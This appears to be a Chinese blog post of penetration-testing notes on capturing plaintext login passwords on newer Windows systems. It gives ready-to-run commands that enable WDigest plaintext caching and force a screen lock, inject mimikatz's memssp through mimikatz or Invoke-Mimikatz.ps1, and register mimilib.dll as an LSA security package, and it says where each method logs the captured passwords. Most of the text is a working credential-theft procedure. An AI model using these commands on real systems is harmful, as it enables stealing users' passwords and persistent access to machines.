获取Windows高版本明文密码

简介: 获取Windows高版本明文密码
+关注继续查看

0x01 前言

这篇文章来自朋友@Leafer(阿宝)日常测试笔记,文中没有过多介绍其理论知识,大家可以自己去学习了解一下!

0x02 改注册表(mimitaze存在免杀问题)

PASS:需要锁屏等方式


修改成记录明文密码

    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

    image


    修改不记录明文密码

      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f


      锁屏

        rundll32.exe user32.dll,LockWorkStation


        修改完之后使用命令锁屏,接下来等待用户再次登录一次就可以抓到了

        image


        0x03 mimikatz插ssp记录密码

        PASS:需要锁屏等方式


        使用mimikatz的一个功能:

          privilege::debug、misc::memssp


          修改完之后使用以下命令锁屏,等用户进入后就可以在C:\Windows\System32\mimilsa.log里面存储登录的密码

            rundll32.exe user32.dll,LockWorkStation

            image


            0x04 使用Invoke-Mimikatz.ps1

            PASS:需要锁屏等方式

              Import-Module .\Invoke-Mimikatz.ps1  //导入命令
              Invoke-Mimikatz -Command "misc::memssp"  //不需要重启获取 
              记录的明文密码存储在这个路径下

              image

                凭据收集总结:
                https://cloud.tencent.com/developer/article/1656546


                0x05 复制mimilib.dll+修改注册表

                PASS:需要重新启动系统

                (1) 在mimikatz中有32和64两个版本,安装包里分别都带有不同位数的mimilib.dllimage

                (2) 将对应版本的dll文件复制到 c:\windows\system32下
                (3) 将以下注册表位置中Security Packages的值设置为mimilib.dll

                  reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f


                  (4) 等待系统重启后,在c:\windows\system32生成文件kiwissp.log,记录当前用户的明文口令

                  image

                  
                  渗透技巧-通过CredSSP导出用户的明文口令:
                  https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87CredSSP%E5%AF%BC%E5%87%BA%E7%94%A8%E6%88%B7%E7%9A%84%E6%98%8E%E6%96%87%E5%8F%A3%E4%BB%A4/
                  相关文章
                  |
                  8天前
                  |
                  Python Windows
                  两个不同python版本的pyinstaller共生 windows
                  两个不同python版本的pyinstaller共生 windows
                  17 0
                  |
                  14天前
                  |
                  TensorFlow 算法框架/工具 异构计算
                  YOLO实践应用之搭建开发环境(Windows系统、Python 3.8、TensorFlow2.3版本)
                  基于YOLO进行物体检测、对象识别,先和大家分享如何搭建开发环境,会分为CPU版本、GPU版本的两种开发环境,本文会分别详细地介绍搭建环境的过程。主要使用TensorFlow2.3、opencv-python4.4.0、Pillow、matplotlib 等依赖库。
                  29 0
                  |
                  14天前
                  |
                  TensorFlow 算法框架/工具 计算机视觉
                  YOLOv3物体/目标检测之实战篇(Windows系统、Python3、TensorFlow2版本)
                   基于YOLO进行物体检测、对象识别,在搭建好开发环境后,先和大家进行实践应用中,体验YOLOv3物体/目标检测效果和魅力;同时逐步了解YOLOv3的不足和优化思路。
                  23 0
                  |
                  21天前
                  |
                  开发框架 JavaScript 应用服务中间件
                  J2EE项目部署与发布(Windows版本)
                  J2EE项目部署与发布(Windows版本)
                  25 0
                  |
                  1月前
                  |
                  数据安全/隐私保护 网络虚拟化 开发者
                  appuploder全过程使用教程(Windows版本)
                  appuploder全过程使用教程(Windows版本)
                  |
                  1月前
                  |
                  并行计算 PyTorch Linux
                  pytorch安装GPU版本 (Cuda12.1)教程: Windows、Mac和Linux系统下GPU版PyTorch(CUDA 12.1)快速安装
                  pytorch安装GPU版本 (Cuda12.1)教程: Windows、Mac和Linux系统下GPU版PyTorch(CUDA 12.1)快速安装
                  215 0
                  |
                  1月前
                  |
                  并行计算 PyTorch Linux
                  pytorch安装GPU版本 (Cuda12.1)教程: Windows、Mac和Linux系统快速安装指南
                  pytorch安装GPU版本 (Cuda12.1)教程: Windows、Mac和Linux系统快速安装指南
                  151 0
                  |
                  3月前
                  |
                  Linux 开发工具 Android开发
                  Android Studio 安装教程 下载最新版 Windows(详细步骤)2021.2.1版本最新版
                  Android Studio 安装教程 下载最新版 Windows(详细步骤)2021.2.1版本最新版
                  |
                  3月前
                  |
                  Kubernetes Devops Shell
                  【DevOps系列】Docker Windows版本安装
                  【DevOps系列】Docker Windows版本安装
                  141 0
                  |
                  3月前
                  |
                  数据安全/隐私保护 网络虚拟化 开发者
                  使用appuploader工具流程(Windows版本)
                  11.安装 使用Appuploader有两种安装方法。 1.未支付apple 688的可以下载iTunes,连接上手机,进入下载中心,选择ipa包安装 2.已支付apple 688d1可以扫码安装测试。
                  热门文章
                  最新文章
                  推荐文章
                  更多